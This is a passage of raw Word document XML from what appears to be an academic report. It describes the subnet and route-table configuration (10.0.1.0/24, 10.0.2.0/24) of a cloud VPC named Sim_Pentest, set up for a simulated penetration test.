        <w:t xml:space="preserve">the next </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>section 4.</w:t>
      </w:r>
      <w:r w:rsidR="00F4503C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00AA6640" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F4503C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D56EAD" w14:textId="77777777" w:rsidR="00B424B7" w:rsidRPr="00D77DFE" w:rsidRDefault="00B424B7" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The configuration used in Subnet 1 is shown in Table 4.2. This subnet is assigned the IPv4 range 10.0.1.0/24. The chosen addressing scheme provides a clear and sequential mapping of IP ranges across all subnets 10.0.1.0/24, 10.0.2.0/24 as shown in Table 4.4 and Table 4.5, 10.0.3.0/24 as shown in Table 4.6 and 4.7, and 10.0.4.0/24 as shown in Table 4.8 and Table 4.9, which simplifies network management, routing, and analysis during the penetration testing simulation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42123C40" w14:textId="747D0001" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="005F7BDE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F7BDE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="002D3301" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subnet 1</w:t>
      </w:r>
      <w:r w:rsidR="003A1361">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4229"/>
        <w:gridCol w:w="4264"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="13EE3C29" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C88B2F7" w14:textId="6DCBD4D9"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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13468879" w14:textId="69521D66"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="783ED351" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3586BF32" w14:textId="334AB978"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D61B3E3" w14:textId="7FA6C4FE"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Subnet_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="62513533" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D3DD20C" w14:textId="02A276EE"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VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67AFE781" w14:textId="074C8E5E" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="002D3301" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sim_Pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="779A5687" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6072D099" w14:textId="582EE20A"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IPv4 CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB96D14" w14:textId="1B6210D8"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10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="67EA0353" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76F67712" w14:textId="3A5DDE44"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Available IPv4 addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6842DB75" w14:textId="6BDF42CB"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250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="455EE2FC" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="178E6F9B" w14:textId="37DF6B30"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IPv6 CI</w:t>
            </w:r>
            <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E5C48BA" w14:textId="11C4FAAA"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Not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="701F8238" w14:textId="77777777" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="002D3301" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4236CF00" w14:textId="111FDA2C" w:rsidR="0092527C" w:rsidRPr="00D77DFE" w:rsidRDefault="00DC6CCC" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration of the route table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 1 is shown in Table 4.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5C763" w14:textId="5D078936" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.3: Configuration of the Route Table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubnet 1</w:t>
      </w:r>
      <w:r w:rsidR="003A1361">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4269"/>
        <w:gridCol w:w="4224"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="784AC246" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D6D846" w14:textId="182A0032"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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4133B8F1" w14:textId="3D7939CE"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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="7FED74F0" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="670BF7A1" w14:textId="52366D61" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="002D330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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5127D399" w14:textId="68AFFB20" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="00427F79" w:rsidP="00427F79">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rPr>
              <w:t>Internet Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3301" w:rsidRPr="00D77DFE" w14:paraId="060AE53A" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53AC0BA7" w14:textId="36EBC8F5" w:rsidR="002D3301"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10.0.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A47F83D" w14:textId="350053E2" w:rsidR="002D3301" w:rsidRPr="00D77DFE" w:rsidRDefault="006A0421"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L</w:t>
            </w:r>
            <w:r w:rsidR="00342153" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ocal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="785D16A1" w14:textId="77777777" w:rsidTr="002D3301">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63D8C709" w14:textId="7C1F68E5"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Explicit subnet association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E589BC9" w14:textId="1BA734C6"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Subnet_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A4E5846" w14:textId="77777777" w:rsidR="0092527C" w:rsidRPr="00D77DFE" w:rsidRDefault="0092527C" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A06C02A" w14:textId="4241EB64" w:rsidR="00DC6CCC" w:rsidRPr="00D77DFE" w:rsidRDefault="00DC6CCC" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration used in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">ubnet </w:t>
      </w:r>
      <w:r w:rsidR="00D86894" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is shown in Table 4.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2660D486" w14:textId="77777777" w:rsidR="00317F9F" w:rsidRPr="00D77DFE" w:rsidRDefault="00317F9F" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590708A6" w14:textId="21576158" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.4: Configuration of the </w:t>
      </w:r>
      <w:r w:rsidR="00342153" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subnet 2</w:t>
      </w:r>
      <w:r w:rsidR="003A1361">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9016" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="68CE4EA7" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A93269C" w14:textId="1B2FFF7C"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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E4F953" w14:textId="2081B73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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="79AA1E87" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="160E7237" w14:textId="1B6907A0"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DAC45DE" w14:textId="1DD7C43C"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Subnet_2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="4614570C" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1712A867" w14:textId="275634DB"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VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E6215B6" w14:textId="5FBFA5AA" w:rsidR="00342153" w:rsidRPr="00D77DFE" w:rsidRDefault="00342153" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sim_Pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="4F8D981B" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F1B4E1A" w14:textId="31368416"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IPv4 CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155C4480" w14:textId="02B3699B"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10.0.2.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="18E3451B" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74061DC2" w14:textId="13760142"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Available IPv4 addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06112286" w14:textId="73328782"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250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="3BC54C9B" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="744ED69D" w14:textId="75F04353"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IPv6 CI</w:t>
            </w:r>
            <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61DEDD05" w14:textId="35F2093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Not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07BDF89D" w14:textId="77777777" w:rsidR="00094048" w:rsidRPr="00D77DFE" w:rsidRDefault="00094048" w:rsidP="00DC6CCC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0327A11A" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4231EB5D" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
